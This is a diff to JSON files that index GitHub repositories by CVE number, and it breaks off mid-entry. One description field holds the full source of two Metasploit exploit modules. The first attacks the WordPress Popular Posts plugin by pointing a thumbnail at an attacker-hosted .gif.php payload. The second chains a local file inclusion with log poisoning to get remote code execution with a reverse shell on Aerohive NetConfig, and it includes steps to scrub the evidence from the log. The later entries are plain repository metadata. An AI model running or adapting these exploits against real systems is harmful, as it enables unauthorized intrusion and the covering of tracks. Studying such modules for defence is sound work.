normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'action' => 'wpp_clear_thumbnail', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 end def enable_custom_fields(cookie, custom_nonce, post) # this should enable the ajax_nonce, it will 302 us back to the referer page as well so we can get it. res = send_request_cgi!( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post.php'), 'cookie' => cookie, 'keep_cookies' => 'true', 'method' => 'POST', 'vars_post' => { 'toggle-custom-fields-nonce' => custom_nonce, '_wp_http_referer' => \"#{normalize_uri(target_uri.path, 'wp-admin', 'post.php')}?post=#{post}&action=edit\", 'action' => 'toggle-custom-fields' } ) \/name=\"_ajax_nonce-add-meta\" value=\"([^\"]*)\/ =~ res.body Regexp.last_match(1) end def create_post(cookie) vprint_status('Creating new post') # get post ID and nonces res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'post-new.php'), 'cookie' => cookie, 'keep_cookies' => 'true' ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 \/name=\"_ajax_nonce-add-meta\" value=\"(?[^\"]*)\/ =~ res.body \/wp.apiFetch.nonceMiddleware = wp.apiFetch.createNonceMiddleware\\( \"(?[^\"]*)\/ =~ res.body \/},\"post\":{\"id\":(?\\d*)\/ =~ res.body if ajax_nonce.nil? print_error('missing ajax nonce field, attempting to re-enable. if this fails, you may need to change the interface to enable this. See https:\/\/www.hostpapa.com\/knowledgebase\/add-custom-meta-boxes-wordpress-posts\/. Or check (while writing a post) Options > Preferences > Panels > Additional > Custom Fields.') \/name=\"toggle-custom-fields-nonce\" value=\"(?[^\"]*)\/ =~ res.body ajax_nonce = enable_custom_fields(cookie, custom_nonce, post_id) end unless ajax_nonce.nil? vprint_status(\"ajax nonce: #{ajax_nonce}\") end unless wp_nonce.nil? vprint_status(\"wp nonce: #{wp_nonce}\") end unless post_id.nil? vprint_status(\"Created Post: #{post_id}\") end fail_with(Failure::UnexpectedReply, 'Unable to retrieve nonces and\/or new post id') unless ajax_nonce && wp_nonce && post_id # publish new post vprint_status(\"Writing content to Post: #{post_id}\") # this is very different from the EDB POC, I kept getting 200 to the home page with their example, so this is based off what the UI submits res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'ctype' => 'application\/json', 'accept' => 'application\/json', 'vars_get' => { '_locale' => 'user', 'rest_route' => normalize_uri(target_uri.path, 'wp', 'v2', 'posts', post_id) }, 'data' => { 'id' => post_id, 'title' => Rex::Text.rand_text_alphanumeric(20..30), 'content' => \"\\n

#{Rex::Text.rand_text_alphanumeric(100..200)}<\/p>\\n\", 'status' => 'publish' }.to_json, 'headers' => { 'X-WP-Nonce' => wp_nonce, 'X-HTTP-Method-Override' => 'PUT' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Post failed to publish') unless res.body.include? '\"status\":\"publish\"' return post_id, ajax_nonce, wp_nonce end def add_meta(cookie, post_id, ajax_nonce, payload_name) payload_url = \"http:\/\/#{datastore['SRVHOSTNAME']}:#{datastore['SRVPORT']}\/#{payload_name}\" vprint_status(\"Adding malicious metadata for redirect to #{payload_url}\") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_post' => { '_ajax_nonce' => 0, 'action' => 'add-meta', 'metakeyselect' => 'wpp_thumbnail', 'metakeyinput' => '', 'metavalue' => payload_url, '_ajax_nonce-add-meta' => ajax_nonce, 'post_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Failed to update metadata') unless res.body.include? \" normalize_uri(target_uri.path, 'index.php'), 'keep_cookies' => 'true', 'cookie' => cookie, 'vars_get' => { 'page_id' => post_id } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 || res.code == 301 print_status(\"Sending #{post_count} views to #{res.headers['Location']}\") location = res.headers['Location'].split('\/')[3...-1].join('\/') # http:\/\/example.com\/\/ (1..post_count).each do |_c| res = send_request_cgi!( 'uri' => \"\/#{location}\", 'cookie' => cookie, 'keep_cookies' => 'true' ) # just send away, who cares about the response fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res = send_request_cgi( # this URL varies from the POC on EDB, and is modeled after what the browser does 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'rest_route' => normalize_uri('wordpress-popular-posts', 'v1', 'popular-posts') }, 'keep_cookies' => 'true', 'method' => 'POST', 'cookie' => cookie, 'vars_post' => { '_wpnonce' => wp_nonce, 'wpp_id' => post_id, 'sampling' => 0, 'sampling_rate' => 100 } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 201 end fail_with(Failure::Unreachable, 'Site not responding') unless res end def get_top_posts print_status('Determining post with most views') res = get_widget \/>(?\\d+) views<\/ =~ res.body views = views.to_i print_status(\"Top Views: #{views}\") views += 5 # make us the top post unless datastore['VISTS'].nil? print_status(\"Overriding post count due to VISITS being set, from #{views} to #{datastore['VISITS']}\") views = datastore['VISITS'] end views end def get_widget # load home page to grab the widget ID. At times we seem to hit the widget when it's refreshing and it doesn't respond # which then would kill the exploit, so in this case we just keep trying. (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 \/data-widget-id=\"wpp-(?\\d+)\/ =~ @res.body # load the widget directly (1..10).each do |_| @res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php', 'wp-json', 'wordpress-popular-posts', 'v1', 'popular-posts', 'widget', widget_id), 'keep_cookies' => 'true', 'vars_get' => { 'is_single' => 0 } ) break unless @res.nil? end fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless @res.code == 200 @res end def exploit fail_with(Failure::BadConfig, 'SRVHOST must be set to an IP address (0.0.0.0 is invalid) for exploitation to be successful') if datastore['SRVHOST'] == '0.0.0.0' cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) if cookie.nil? vprint_error('Invalid login, check credentials') return end payload_name = \"#{Rex::Text.rand_text_alphanumeric(5..8)}.gif.php\" vprint_status(\"Payload file name: #{payload_name}\") fail_with(Failure::NotVulnerable, 'gd is not installed on server, uexploitable') unless check_gd_installed(cookie) post_count = get_top_posts # we dont need to pass the cookie anymore since its now saved into http client token = get_wpp_admin_token(cookie) vprint_status(\"wpp_admin_token: #{token}\") change_settings(cookie, token) clear_cache(cookie, token) post_id, ajax_nonce, wp_nonce = create_post(cookie) print_status('Starting web server to handle request for image payload') start_service({ 'Uri' => { 'Proc' => proc { |cli, req| on_request_uri(cli, req, payload_name, post_id) }, 'Path' => \"\/#{payload_name}\" } }) add_meta(cookie, post_id, ajax_nonce, payload_name) boost_post(cookie, post_id, wp_nonce, post_count) print_status('Waiting 90sec for cache refresh by server') Rex.sleep(90) print_status('Attempting to force loading of shell by visiting to homepage and loading the widget') res = get_widget print_good('We made it to the top!') if res.body.include? payload_name # if res.body.include? datastore['SRVHOSTNAME'] # fail_with(Failure::UnexpectedReply, \"Found #{datastore['SRVHOSTNAME']} in page content. Payload likely wasn't copied to the server.\") # end # at this point, we rely on our web server getting requests to make the rest happen endend### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE', 'Description' => %q{ This module exploits LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user. NetConfig is the Aerohive\/Extreme Networks HiveOS administrative webinterface. Vulnerable versions allow for LFI because they rely on a version of PHP 5 that is vulnerable to string truncation attacks. This module leverages this issue in conjunction with log poisoning to gain RCE as root. Upon successful exploitation, the Aerohive NetConfig application will hang for as long as the spawned shell remains open. Closing the session should render the app responsive again. The module provides an automatic cleanup option to clean the log. However, this option is disabled by default because any modifications to the \/tmp\/messages log, even via sed, may render the target (temporarily) unexploitable. This state can last over an hour. This module has been successfully tested against Aerohive NetConfig versions 8.2r4 and 10.0r7a. }, 'License' => MSF_LICENSE, 'Author' => [ 'Erik de Jong', # github.com\/eriknl - discovery and PoC 'Erik Wynter' # @wyntererik - Metasploit ], 'References' => [ ['CVE', '2020-16152'], # still categorized as RESERVED ['URL', 'https:\/\/github.com\/eriknl\/CVE-2020-16152'] # analysis and PoC code ], 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 }, 'Platform' => %w[linux unix], 'Arch' => [ ARCH_ARMLE, ARCH_CMD ], 'Targets' => [ [ 'Linux', { 'Arch' => [ARCH_ARMLE], 'Platform' => 'linux', 'DefaultOptions' => { 'PAYLOAD' => 'linux\/armle\/meterpreter\/reverse_tcp', 'CMDSTAGER::FLAVOR' => 'curl' } } ], [ 'CMD', { 'Arch' => [ARCH_CMD], 'Platform' => 'unix', 'DefaultOptions' => { 'PAYLOAD' => 'cmd\/unix\/reverse_openssl' # this may be the only payload that works for this target' } } ] ], 'Privileged' => true, 'DisclosureDate' => '2020-02-17', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('TARGETURI', [true, 'The base path to Aerohive NetConfig', '\/']), OptBool.new('AUTO_CLEAN_LOG', [true, 'Automatically clean the \/tmp\/messages log upon spawning a shell. WARNING! This may render the target unexploitable', false]), ] end def auto_clean_log datastore['AUTO_CLEAN_LOG'] end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php5') }) unless res return CheckCode::Unknown('Connection failed.') end unless res.code == 200 && res.body.include?('Aerohive NetConfig UI') return CheckCode::Safe('Target is not an Aerohive NetConfig application.') end version = res.body.scan(\/action=\"login\\.php5\\?version=(.*?)\"\/)&.flatten&.first unless version return CheckCode::Detected('Could not determine Aerohive NetConfig version.') end begin if Rex::Version.new(version) <= Rex::Version.new('10.0r8a') return CheckCode::Appears(\"The target is Aerohive NetConfig version #{version}\") else print_warning('It should be noted that it is unclear if\/when this issue was patched, so versions after 10.0r8a may still be vulnerable.') return CheckCode::Safe(\"The target is Aerohive NetConfig version #{version}\") end rescue StandardError => e return CheckCode::Unknown(\"Failed to obtain a valid Aerohive NetConfig version: #{e}\") end end def poison_log password = rand_text_alphanumeric(8..12) @shell_cmd_name = rand_text_alphanumeric(3..6) @poison_cmd = \"\" # Poison \/tmp\/messages print_status('Attempting to poison the log at \/tmp\/messages...') res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'login.php5'), 'vars_post' => { 'login_auth' => 0, 'miniHiveUI' => 1, 'authselect' => 'Name\/Password', 'userName' => @poison_cmd, 'password' => password } }) unless res fail_with(Failure::Disconnected, 'Connection failed while trying to poison the log at \/tmp\/messages') end unless res.code == 200 && res.body.include?('cmn\/redirectLogin.php5?ERROR_TYPE=MQ==') fail_with(Failure::UnexpectedReply, 'Unexpected response received while trying to poison the log at \/tmp\/messages') end print_status('Server responded as expected. Continuing...') end def on_new_session(session) log_cleaned = false if auto_clean_log print_status('Attempting to clean the log file at \/tmp\/messages...') print_warning('Please note this will render the target (temporarily) unexploitable. This state can last over an hour.') begin # We need remove the line containing the PHP system call from \/tmp\/messages # The special chars in the PHP syscall make it nearly impossible to use sed to replace the PHP syscall with a regular username. # Instead, let's avoid special chars by stringing together some grep commands to make sure we have the right line and then removing that entire line # The impact of using sed to edit the file on the fly and using grep to create a new file and overwrite \/tmp\/messages with it, is the same: # In both cases the app will likely stop writing to \/tmp\/messages for quite a while (could be over an hour), rendering the target unexploitable during that period. line_to_delete_file = \"\/tmp\/#{rand_text_alphanumeric(5..10)}\" clean_messages_file = \"\/tmp\/#{rand_text_alphanumeric(5..10)}\" cmds_to_clean_log = \"grep #{@shell_cmd_name} \/tmp\/messages | grep POST | grep 'php system' > #{line_to_delete_file}; \"\\ \"grep -vFf #{line_to_delete_file} \/tmp\/messages > #{clean_messages_file}; mv #{clean_messages_file} \/tmp\/messages; rm -f #{line_to_delete_file}\" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute('\/bin\/sh', \"-c \\\"#{cmds_to_clean_log}\\\"\") # Wait for cleanup Rex.sleep 5 # Check for the PHP system call in \/tmp\/messages messages_contents = session.fs.file.open('\/tmp\/messages').read.to_s # using =~ here produced unexpected results, so include? is used instead unless messages_contents.include?(@poison_cmd) log_cleaned = true end elsif session.type.to_s.eql?('shell') session.shell_command_token(cmds_to_clean_log.to_s) # Check for the PHP system call in \/tmp\/messages poison_evidence = session.shell_command_token(\"grep #{@shell_cmd_name} \/tmp\/messages | grep POST | grep 'php system'\") # using =~ here produced unexpected results, so include? is used instead unless poison_evidence.include?(@poison_cmd) log_cleaned = true end end rescue StandardError => e print_error(\"Error during cleanup: #{e.message}\") ensure super end unless log_cleaned print_warning(\"Could not replace the PHP system call '#{@poison_cmd}' in \/tmp\/messages\") end end if log_cleaned print_good('Successfully cleaned up the log by deleting the line with the PHP syscal from \/tmp\/messages.') else print_warning(\"Erasing the log poisoning evidence will require manually editing\/removing the line in \/tmp\/messages that contains the poison command:\\n\\t#{@poison_cmd}\") print_warning('Please note that any modifications to \/tmp\/messages, even via sed, will render the target (temporarily) unexploitable. This state can last over an hour.') print_warning('Deleting \/tmp\/messages or clearing out the file may break the application.') end end def execute_command(cmd, _opts = {}) print_status('Attempting to execute the payload') send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'action.php5'), 'vars_get' => { '_action' => 'list', 'debug' => 'true' }, 'vars_post' => { '_page' => rand_text_alphanumeric(1) + '\/..' * 8 + '\/' * 4041 + '\/tmp\/messages', # Trigger LFI through path truncation @shell_cmd_name => cmd } }, 0) print_warning('In case of successful exploitation, the Aerohive NetConfig web application will hang for as long as the spawned shell remains open.') end def exploit poison_log if target.arch.first == ARCH_CMD print_status('Executing the payload') execute_command(payload.encoded) else execute_cmdstager(background: true) end endend", + "fork": false, + "created_at": "2022-01-02T08:08:00Z", + "updated_at": "2024-11-24T15:36:54Z", + "pushed_at": "2022-01-02T08:08:01Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-16270.json b/2020/CVE-2020-16270.json new file mode 100644 index 0000000000..fcc60131fd --- /dev/null +++ b/2020/CVE-2020-16270.json @@ -0,0 +1,33 @@ +[ + { + "id": 304345770, + "name": "CVE-2020-16270", + "full_name": "Security-AVS\/CVE-2020-16270", + "owner": { + "login": "Security-AVS", + "id": 72926885, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72926885?v=4", + "html_url": "https:\/\/github.com\/Security-AVS", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Security-AVS\/CVE-2020-16270", + "description": null, + "fork": false, + "created_at": "2020-10-15T14:06:28Z", + "updated_at": "2020-10-15T15:07:15Z", + "pushed_at": "2020-10-15T15:07:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-16846.json b/2020/CVE-2020-16846.json new file mode 100644 index 0000000000..1f6aa886ea --- /dev/null +++ b/2020/CVE-2020-16846.json @@ -0,0 +1,64 @@ +[ + { + "id": 417081130, + "name": "CVE-2020-16846-Saltstack-Salt-API", + "full_name": "zomy22\/CVE-2020-16846-Saltstack-Salt-API", + "owner": { + "login": "zomy22", + "id": 59493928, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59493928?v=4", + "html_url": "https:\/\/github.com\/zomy22", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zomy22\/CVE-2020-16846-Saltstack-Salt-API", + "description": null, + "fork": false, + "created_at": "2021-10-14T10:09:48Z", + "updated_at": "2021-10-26T12:21:49Z", + "pushed_at": "2021-10-26T12:21:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 577393491, + "name": "projet-secu", + "full_name": "hamza-boudouche\/projet-secu", + "owner": { + "login": "hamza-boudouche", + "id": 74379434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74379434?v=4", + "html_url": "https:\/\/github.com\/hamza-boudouche", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hamza-boudouche\/projet-secu", + "description": "CVE-2020-16846", + "fork": false, + "created_at": "2022-12-12T16:29:36Z", + "updated_at": "2022-12-12T16:29:53Z", + "pushed_at": "2022-12-12T17:07:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-16898.json b/2020/CVE-2020-16898.json new file mode 100644 index 0000000000..dc7e0f4145 --- /dev/null +++ b/2020/CVE-2020-16898.json @@ -0,0 +1,455 @@ +[ + { + "id": 302145941, + "name": "CVE-2020-16898", + "full_name": "advanced-threat-research\/CVE-2020-16898", + "owner": { + "login": "advanced-threat-research", + "id": 27901279, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27901279?v=4", + "html_url": "https:\/\/github.com\/advanced-threat-research", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/advanced-threat-research\/CVE-2020-16898", + "description": "CVE-2020-16898 (Bad Neighbor) Microsoft Windows TCP\/IP Vulnerability Detection Logic and Rule", + "fork": false, + "created_at": "2020-10-07T19:56:09Z", + "updated_at": "2024-08-16T15:29:42Z", + "pushed_at": "2020-10-26T10:15:32Z", + "stargazers_count": 207, + "watchers_count": 207, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atr", + "bad-neighbor", + "badneighbor", + "buffer-overflow", + "buffer-overflow-vulnerability", + "cve", + "cve-2020-16898", + "icmpv6", + "lua", + "mcafee", + "microsoft", + "neighbor-discovery", + "neighbor-discovery-protocol", + "rce", + "suricata", + "suricata-rule", + "tcpip-stack", + "windows-10" + ], + "visibility": "public", + "forks": 31, + "watchers": 207, + "score": 0, + "subscribers_count": 18 + }, + { + "id": 303891965, + "name": "CVE-2020-16898", + "full_name": "corelight\/CVE-2020-16898", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2020-16898", + "description": "A network detection package for CVE-2020-16898 (Windows TCP\/IP Remote Code Execution Vulnerability)", + "fork": false, + "created_at": "2020-10-14T03:25:00Z", + "updated_at": "2024-10-12T10:28:29Z", + "pushed_at": "2024-09-03T18:23:10Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 13 + }, + { + "id": 304024639, + "name": "CVE-2020-16898_Check", + "full_name": "Maliek\/CVE-2020-16898_Check", + "owner": { + "login": "Maliek", + "id": 8858341, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8858341?v=4", + "html_url": "https:\/\/github.com\/Maliek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Maliek\/CVE-2020-16898_Check", + "description": "Minor powershell script that checks for vulnerable interfaces.", + "fork": false, + "created_at": "2020-10-14T13:30:38Z", + "updated_at": "2020-10-16T09:20:02Z", + "pushed_at": "2020-10-16T09:20:00Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 304044860, + "name": "CVE-2020-16898", + "full_name": "ZephrFish\/CVE-2020-16898", + "owner": { + "login": "ZephrFish", + "id": 5783068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5783068?v=4", + "html_url": "https:\/\/github.com\/ZephrFish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZephrFish\/CVE-2020-16898", + "description": "HoneyPoC 2.0: Proof-of-Concept (PoC) script to exploit IPv6 (CVE-2020-16898).", + "fork": false, + "created_at": "2020-10-14T14:42:52Z", + "updated_at": "2023-03-01T05:20:04Z", + "pushed_at": "2020-10-14T16:56:04Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 304075693, + "name": "cve-2020-16898", + "full_name": "esnet-security\/cve-2020-16898", + "owner": { + "login": "esnet-security", + "id": 46755983, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46755983?v=4", + "html_url": "https:\/\/github.com\/esnet-security", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/esnet-security\/cve-2020-16898", + "description": "Detects CVE-2020-16898: \"Bad Neighbor\"", + "fork": false, + "created_at": "2020-10-14T16:38:06Z", + "updated_at": "2020-10-15T15:39:52Z", + "pushed_at": "2020-10-15T23:00:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 304139222, + "name": "CVE-2020-16898-Bad-Neighbor", + "full_name": "initconf\/CVE-2020-16898-Bad-Neighbor", + "owner": { + "login": "initconf", + "id": 4044729, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4044729?v=4", + "html_url": "https:\/\/github.com\/initconf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/initconf\/CVE-2020-16898-Bad-Neighbor", + "description": "Zeek detection for CVE-2020-16898-\"Bad Neighbor\"", + "fork": false, + "created_at": "2020-10-14T21:25:09Z", + "updated_at": "2023-03-21T04:55:12Z", + "pushed_at": "2020-10-22T21:12:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 304538917, + "name": "CVE-2020-16898", + "full_name": "Q1984\/CVE-2020-16898", + "owner": { + "login": "Q1984", + "id": 50952023, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50952023?v=4", + "html_url": "https:\/\/github.com\/Q1984", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Q1984\/CVE-2020-16898", + "description": "PoC Bad Neighbor BSOD exploit", + "fork": false, + "created_at": "2020-10-16T06:27:24Z", + "updated_at": "2022-08-21T16:31:19Z", + "pushed_at": "2020-10-16T11:17:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 304755825, + "name": "cve-2020-16898", + "full_name": "0xeb-bp\/cve-2020-16898", + "owner": { + "login": "0xeb-bp", + "id": 53204152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53204152?v=4", + "html_url": "https:\/\/github.com\/0xeb-bp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xeb-bp\/cve-2020-16898", + "description": "PoC BSOD for CVE-2020-16898 (badneighbor)", + "fork": false, + "created_at": "2020-10-16T23:03:15Z", + "updated_at": "2024-09-02T07:58:55Z", + "pushed_at": "2020-10-16T23:12:52Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 21, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 304797048, + "name": "cve-2020-16898", + "full_name": "jiansiting\/cve-2020-16898", + "owner": { + "login": "jiansiting", + "id": 28823754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28823754?v=4", + "html_url": "https:\/\/github.com\/jiansiting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jiansiting\/cve-2020-16898", + "description": "PoC BSOD for CVE-2020-16898", + "fork": false, + "created_at": "2020-10-17T04:32:11Z", + "updated_at": "2024-09-02T07:59:28Z", + "pushed_at": "2020-10-17T04:32:19Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 304819444, + "name": "CVE-2020-16898_Workaround", + "full_name": "CPO-EH\/CVE-2020-16898_Workaround", + "owner": { + "login": "CPO-EH", + "id": 56457033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56457033?v=4", + "html_url": "https:\/\/github.com\/CPO-EH", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CPO-EH\/CVE-2020-16898_Workaround", + "description": "PowerShell Script Workaround for VCE-220-16898 Vulnerability", + "fork": false, + "created_at": "2020-10-17T07:09:58Z", + "updated_at": "2020-10-21T16:45:04Z", + "pushed_at": "2020-10-21T16:45:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 304851828, + "name": "CVE-2020-16898_Checker", + "full_name": "CPO-EH\/CVE-2020-16898_Checker", + "owner": { + "login": "CPO-EH", + "id": 56457033, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56457033?v=4", + "html_url": "https:\/\/github.com\/CPO-EH", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CPO-EH\/CVE-2020-16898_Checker", + "description": "Check all Network Interfaces for CVE-2020-16898 Vulnerability", + "fork": false, + "created_at": "2020-10-17T10:23:56Z", + "updated_at": "2020-10-21T17:45:24Z", + "pushed_at": "2020-10-21T17:45:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 304888543, + "name": "CVE-2020-16898-exp", + "full_name": "momika233\/CVE-2020-16898-exp", + "owner": { + "login": "momika233", + "id": 56291820, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4", + "html_url": "https:\/\/github.com\/momika233", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/momika233\/CVE-2020-16898-exp", + "description": null, + "fork": false, + "created_at": "2020-10-17T13:52:08Z", + "updated_at": "2024-08-12T20:06:50Z", + "pushed_at": "2020-10-17T13:52:38Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 305598825, + "name": "CVE-2020-16898-EXP-POC", + "full_name": "komomon\/CVE-2020-16898-EXP-POC", + "owner": { + "login": "komomon", + "id": 52700174, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52700174?v=4", + "html_url": 